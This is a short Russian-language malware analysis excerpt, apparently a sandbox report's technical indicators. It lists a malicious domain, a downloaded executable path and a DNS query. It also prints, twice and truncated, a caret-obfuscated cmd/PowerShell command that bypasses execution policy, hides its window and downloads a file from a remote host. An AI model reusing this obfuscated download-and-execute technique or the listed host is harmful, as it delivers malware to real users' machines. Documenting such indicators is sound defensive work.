Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^We^r^SHell.^E^xe^ -EXe^C^u^t^iO^N^p^O^lI^cY^ B^YP^A^s^s -NoProfiLe -Win^D^Ow^s^ty^L^E h^id^d^En (neW-^o^BJEC^T^ SYste^m.^NeT^.WEB^cLIeNT).^d^O^W^nLO^AdFIlE('http://t...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "PO^We^r^SHell.^E^xe^ -EXe^C^u^t^iO^N^p^O^lI^cY^ B^YP^A^s^s -NoProfiLe -Win^D^Ow^s^ty^L^E h^id^d^En (neW-^o^BJEC^T^ SYste^m.^NeT^.WEB^cLIeNT).^d^O^W^nLO^AdFIlE('http://t...' (со скрытым окном)